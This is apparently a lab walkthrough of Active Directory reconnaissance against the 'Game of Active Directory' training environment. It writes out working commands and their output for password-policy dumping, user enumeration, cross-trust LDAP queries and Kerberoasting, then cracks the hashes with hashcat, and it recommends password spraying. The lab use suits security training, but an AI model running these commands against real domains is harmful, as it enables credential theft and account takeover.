Game of Active Directory - Part 3 [Recon]

Previously:

Found two user names and passwords for the users, Samwell.tarly and Brandon.stark.

Note: A good thing to note in here is to not use any password spraying as there is a high chance of blocking the users. Its always a good practice to look at the password policy of the domain.

crackmapexec smb winterfell --pass-pol or netexec smb winterfell --pass-pol

└─# netexec smb winterfell --pass-pol
SMB         172.16.100.51   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         172.16.100.51   445    WINTERFELL       [+] Dumping password info for domain: NORTH
SMB         172.16.100.51   445    WINTERFELL       Minimum password length: 5
SMB         172.16.100.51   445    WINTERFELL       Password history length: 24
SMB         172.16.100.51   445    WINTERFELL       Maximum password age: 311 days 2 minutes 
SMB         172.16.100.51   445    WINTERFELL       
SMB         172.16.100.51   445    WINTERFELL       Password Complexity Flags: 000000
SMB         172.16.100.51   445    WINTERFELL           Domain Refuse Password Change: 0
SMB         172.16.100.51   445    WINTERFELL           Domain Password Store Cleartext: 0
SMB         172.16.100.51   445    WINTERFELL           Domain Password Lockout Admins: 0
SMB         172.16.100.51   445    WINTERFELL           Domain Password No Clear Change: 0
SMB         172.16.100.51   445    WINTERFELL           Domain Password No Anon Change: 0
SMB         172.16.100.51   445    WINTERFELL           Domain Password Complex: 0
SMB         172.16.100.51   445    WINTERFELL       
SMB         172.16.100.51   445    WINTERFELL       Minimum password age: 1 day 4 minutes 
SMB         172.16.100.51   445    WINTERFELL       Reset Account Lockout Counter: 5 minutes 
SMB         172.16.100.51   445    WINTERFELL       Locked Account Duration: 5 minutes 
SMB         172.16.100.51   445    WINTERFELL       Account Lockout Threshold: 5
SMB         172.16.100.51   445    WINTERFELL       Forced Log off Time: Not Set

From above we can see that the password policy says if we fail 5 times in 5 minutes we lock the accounts for 5 minutes.

From here there are two ways to check for the other attacks. 1. Kerberoasting 2. Check for possible RDP to Winterfell using the gained creds 3. Drop in sharphound to check for other cool stuff

We shall start with finding more users in the domain/s

As we’ve found some users lets see, if we can find more users in the domain/s and see what can we get from those creds.

From MayFly’s blogs:

• When you get an account on an active directory, the first thing to do is always getting the full list of users.
• Once you get it you could do a password spray on the full user list (very often you will find other accounts with weak password like username=password, SeasonYear!, SocietynameYear! or even 123456).

GetADUsers.py -all north.sevenkingdoms.local/brandon.stark:iseedeadpeople

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Querying north.sevenkingdoms.local for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2022-06-29 00:32:20.901897  2022-07-01 17:48:41.983605 
Guest                                                 <never>              <never>             
vagrant                                               2021-05-12 13:38:55.922520  2022-07-01 12:08:35.223885 
krbtgt                                                2022-06-29 00:48:58.950440  <never>             
arya.stark                                            2022-06-29 07:48:08.060667  2022-07-03 17:40:06.721358 
eddard.stark                                          2022-06-29 07:48:11.560625  2022-07-04 23:33:27.976702 
catelyn.stark                                         2022-06-29 07:48:15.013735  <never>             
robb.stark                                            2022-06-29 07:48:18.544972  2022-07-04 23:35:50.678794 
sansa.stark                                           2022-06-29 07:48:21.607059  <never>             
brandon.stark                                         2022-06-29 07:48:24.278459  2022-07-04 23:36:08.991489 
rickon.stark                                          2022-06-29 07:48:26.966809  <never>             
hodor                                                 2022-06-29 07:48:29.670052  2022-07-04 23:21:58.774078 
jon.snow                                              2022-06-29 07:48:32.373101  2022-07-03 17:36:26.798060 
samwell.tarly                                         2022-06-29 07:48:35.107476  2022-07-01 16:35:17.043960 
jeor.mormont                                          2022-06-29 07:48:37.841846  <never>             
sql_svc                                               2022-06-29 07:48:40.248028  2022-07-03 15:56:57.924607

• With ldap query, i recommend this article with all the useful ldap query for active directory : https://podalirius.net/en/articles/useful-ldap-queries-for-windows-active-directory-pentesting/

• With ldap on north.sevenkingdoms.local

ldapsearch -H ldap://172.16.100.51 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=north,DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" |grep 'distinguishedName:'

• With ldap query we can request users of the others domain because a trust is present.

• On essos.local

ldapsearch -H ldap://172.16.100.52 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b ',DC=essos,DC=local' "(&(objectCategory=person)(objectClass=user))"

ldapsearch -H ldap://172.16.100.50 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))"

Kerberoasting

• On an active directory, we will see very often users with an SPN set.

• let’s find them with impacket

GetUserSPNs.py -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName                                 Name      MemberOf                                                    PasswordLastSet             LastLogon                   Delegation  
---------------------------------------------------  --------  ----------------------------------------------------------  --------------------------  --------------------------  -----------
CIFS/winterfell.north.sevenkingdoms.local            jon.snow  CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2022-06-29 07:48:32.373101  2022-06-29 10:34:54.308171  constrained 
HTTP/thewall.north.sevenkingdoms.local               jon.snow  CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2022-06-29 07:48:32.373101  2022-06-29 10:34:54.308171  constrained 
MSSQLSvc/castelblack.north.sevenkingdoms.local       sql_svc                                                               2022-06-29 07:48:40.248028  2022-06-29 22:54:57.422114              
MSSQLSvc/castelblack.north.sevenkingdoms.local:1433  sql_svc                                                               2022-06-29 07:48:40.248028  2022-06-29 22:54:57.422114

All the hashes will be stored in the file named kerberoasting.hashes

• we could also do that with cme with the following command

cme ldap 192.168.56.11 -u brandon.stark -p 'iseedeadpeople' -d north.sevenkingdoms.local --kerberoasting KERBEROASTING

• Now let’s try to crack the hashes

hashcat -m 13100 --force -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt --force

Creds Found:

user : north/jon.snow:iknownothing